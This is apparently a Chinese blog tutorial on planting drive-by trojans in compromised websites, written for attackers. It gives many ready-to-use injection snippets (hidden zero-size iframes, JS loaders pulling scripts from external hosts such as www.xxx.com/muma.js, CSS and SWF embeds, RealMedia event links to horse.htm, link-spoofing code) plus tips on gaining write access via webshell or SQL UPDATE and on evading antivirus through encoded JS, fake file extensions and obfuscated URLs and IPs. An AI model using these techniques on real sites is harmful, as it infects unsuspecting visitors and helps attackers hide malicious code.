分析网页挂马步骤和方法

文章目录

步骤方法

原理很简单,就是在别人网站插入一个自己的网马的页面,等有漏洞的人查看了被挂马网页,那么他就成了你的肉鸡了。拿到webshell,挂马自然很简单。但是拿不到的情况下,如果注入点有update权限,我们可以仔细查找首页中的某条新闻的调用链接,然后update数据库达到我们的目的。如果可进入后台,我没就可以在一些发公告的地方写入自己的木马代码(不要打乱html源文件的代码逻辑)。挂马网页一般放网站的首页,index.htm、index.html、index.asp、index.aspx、index.php、index.cgi、index.jsp、default.htm(,html,asp,aspx,php) 等。

代码分类

1. 框架挂马
<iframe src=”你的网马地址” width=”0″ height=”0″ frameborder=”0″></iframe>

2. js文件挂马
首先将以下代码
document.write(“<iframe width=’0′ height=’0′ src=’你的网马地址></iframe>”);
保存为xxx.js,
则JS挂马代码为<script language=javascript src=xxx.js></script>

3. js变形加密
<SCRIPT language=”JScript.Encode” src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀

4. body挂马
<body onload=”window.location=’地址’;”></body>

5. 隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<iframe src=”http://www.xxx.com/muma.htm/”></iframe>’;

6. css中挂马
body {
background-image: url(‘javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}

7. JAJA挂马
<SCRIPT language=javascript>
window.open (“地址”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1″);
</script>

8. 图片伪装
<html>
<iframe src=”网马地址” height=0 width=0></iframe>
<img src=”图片地址”></center>
<ml>

9. 伪装调用:
<frameset rows=”444,0″ cols=”*”>
<frame src=”打开网页” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>
<frame src=”网马地址” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>
</frameset>

10. 高级欺骗
<a href=”http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)” onMouseOver=”www_163_com(); return true;”> 页面要显示的内容 </a>
<SCRIPT Language=”JavaScript”>
function www_163_com ()
{
var url=”网马地址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10″);
}
</SCRIPT>

11. swf挂马
swf用工具替换原来网页中的swf或单独把swf发给对方,在网页中插入swf的语法一般格式为:
<OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high> <EMBED src=”http://www.7747.net/xxx.swf” quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash type=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>

12. 影音文件挂马
所需工具RealMedia Editor,打开工具后,然后依次选择“文件”-“打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal&&http://www.xxx.com/horse.htm(00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)
输入完毕后并保存,然后依次选择“工具”-“合并事件”,导入刚才的文本。当合并完成后,依次选择“文本”-“Real文件另存为”,保存好即可。最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址。

代码隐蔽性 

1. 远程任意后缀执行HTML
可以把horse.html成horse.jpg之类的后缀,然后语句写成<iframe src=/uploadfile/201802/20181116.jpg width=0 height=0></iframe>。js也可以,语句为<script src=/uploadfile/201802/20181116.jpg></script>,甚至js的不要后缀名都可以。
2. JS的加密
为了保护网页木马的代码,可以把JS内容加密,还能躲开杀软的作用。如果使用ENCODE加密方式,加密后的JS调用语句就用。除此方法外,还有其它更多的方法!
3. URL的变形
URL的变形方法也有很多,例如将url的16进制转换为encod编码等。如果是涉及到URL欺骗的方法就更多了,不过多数的URL欺骗,像利用@的技巧,IE都已经打补丁了。但现在有个漏洞仍然有效,代码如下:
<a id=”CZY” href=”http://www.baidu.com”></a>
<div>
<a href=”http://www.google.cn” target=”_blank”>
<table>
<caption>
<a href=”http://www.google.cn” target=”_blank”>
<label for=”CZY”>
<u style=”cursor: pointer: color: blue”>
Google</u>
</label></a></caption></table></a></div>
保存该代码为网页后,鼠标移动到Google这个链接上时,IE状态栏显示的是http://www.google.cn,但点击链接后却打开http: //www.baidu.com网站。如果你的网马可以用IP地址访问到的话,IP地址也可以进行转换的。像127.0.0.1这样的IP还可以变为 2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等,这只不过是8进制、10进制、16进制、的转换而已。

 

打赏